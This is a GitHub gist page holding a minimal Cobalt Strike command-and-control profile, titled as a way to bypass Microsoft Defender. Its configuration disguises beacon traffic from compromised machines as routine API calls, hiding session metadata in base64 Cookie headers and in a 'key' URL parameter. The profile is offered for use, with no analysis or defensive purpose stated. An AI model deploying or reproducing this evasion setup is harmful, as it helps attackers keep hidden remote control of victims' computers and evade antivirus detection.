-
-
Save deltaclock/fe44319460b0a8e784e09cd65c433ddc to your computer and use it in GitHub Desktop.
Minimal Cobalt Strike C2 Profile for Bypassing Defender
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| http-get { | |
| set uri "/apiv8/getStatus"; | |
| client { | |
| metadata { | |
| base64; | |
| header "Cookie"; | |
| } | |
| } | |
| server { | |
| output { | |
| print; | |
| } | |
| } | |
| } | |
| http-post { | |
| set uri "/apiv8/updateConfig"; | |
| client { | |
| id { | |
| base64url; | |
| parameter "key"; | |
| } | |
| output { | |
| print; | |
| } | |
| } | |
| server { | |
| output { | |
| print; | |
| } | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment